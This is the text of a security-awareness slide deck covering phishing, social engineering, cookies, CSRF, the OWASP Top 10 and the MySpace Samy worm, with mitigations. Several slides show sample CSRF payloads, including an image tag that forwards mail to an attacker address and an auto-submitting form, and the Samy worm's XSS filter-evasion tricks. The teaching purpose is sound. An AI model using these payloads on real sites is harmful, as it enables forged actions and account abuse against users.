Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Web Vulnerabilities - Building Basic Security Awareness

494 views

Published on

A presentation on Web Vulnerabilities, especially around Social Engineering & Manipulation, with examples.

I presented this talk at ThoughtWorks Pune office, to help raise awareness on how unsuspecting people can be tricked into giving up information, and bypassing strong security measures easily.

Some topics covered include Phishing, Spear Phishing, Fake Login screens, Social Engineering, Panopticlick based user identification, Cookies, CSRF, and some good practices for developers to keep in mind.

Published in: Software
  • Be the first to comment

  • Be the first to like this

Web Vulnerabilities - Building Basic Security Awareness

  1. 1. Web Vulnerabilities Being Aware of Risks and Mitigation options Gurpreet Luthra @_zenx_
  2. 2. Please enter your google credentials to access the photo album.
  3. 3. Phishing
  4. 4. Simple Google Search
  5. 5. A n o t h e r E x a m p l e - - - G y m M
  6. 6. Spear Phishing
  7. 7. Strong Security
  8. 8. Social Engineering The clever manipulation of the natural human tendency to trust.
  9. 9. Social Engineering • Phishing • Spear Phishing • Vishing • Baiting • Tailgaiting
  10. 10. PROTECT
  11. 11. PROTECT SSL / Digital Certificates Personal Image or Message [Verified by Visa] RSA / 2-Step Auth OTP (ICICI or Facebook) Log Referral Websites Safe Browsing API (Google) https://developers.google.com/safe-browsing/ Phishing Detection Plugin
  12. 12. Social Engineering “A typical system will reject log-ins continually, ensuring the victim enters PINs or passwords multiple times, often disclosing several different passwords!” http://en.wikipedia.org/wiki/Social_engineering_(security)
  13. 13. Cookies
  14. 14. Gmail Cookies ThoughtWorks Cookies
  15. 15. Cross Site Request Forgery (CSRF) <img src="http://my-email.com/logout"> <img src="http://facebook.com/add_friend?uid=2345adbehd3332a23"> <img src=“http://intranet/report- app/mail?r=1&m=attacker@gmail.com” width=“1” height=“1” border=“0”/>
  16. 16. Cross Site Request Forgery (CSRF) <body onload="document.getElementById('frm').submit()"> <form id="frm" action="http://my-mail.com/logout" method="post"> <input name="Log Me Out" value="Log Me Out" /> </form> </body> On website of http://www.attacker.com:
  17. 17. PROTECT Check Referer GET should not change state or have side effects User auth for transactions + Captcha Double submit cookies + CSRF Token Separate Browser
  18. 18. Cross Site Request Forgery (CSRF) Cross-Site Request Forgery (CSRF) was among the twenty most- exploited security vulnerabilities of 2007, along with Cross-Site Scripting (XSS) and SQL Injection. Also mentioned in the OWASP Top 10 Vulnerabilities of 2010.
  19. 19. OWASP Top 10 • Injection (SQL, LDAP, etc) • Cross Site Scripting (XSS) • Broken Auth and Session Mgmt • Insecure Direct Object Reference • Cross Site Request Forgery (CSRF) • Security Misconfiguration • Insecure Cryptographic Storage • Failure to Restrict URL access • Insufficient Transport Layer Protection • Un-validated Redirects and Forwards
  20. 20. The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards.” – Gene Spafford Gurpreet Luthra @_zenx_
  21. 21. SAM WORM --- MySpace <div style="background:url('javascript:alert(1)')"> <div id="mycode" expr="alert('hah!')" style="background:url('javascript:eval(document. all.mycode.expr)')"> No Javascript Allowed Out of Quotes
  22. 22. SAM WORM --- MySpace <div id="mycode" expr="alert('hah!')" style="background:url('java script:eval(document.all.mycode.expr)')"> <div id="mycode" expr="alert('double quote: ' + String.fromCharCode(34))" style="background:url('java script:eval(document.all.mycode.expr)')"> “Javascript” word More Quotes needed
  23. 23. SAM WORM --- MySpace alert(eval('document.body.inne' + 'rHTML')); No Problem. First post a GET in an Ajax request, and then take the hash and put it as part of a POST. http://namb.la/popular/tech.html Words like innerHTML – not allowed Unique Hash needed to POST
  24. 24. The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards.” – Gene Spafford Gurpreet Luthra @_zenx_

×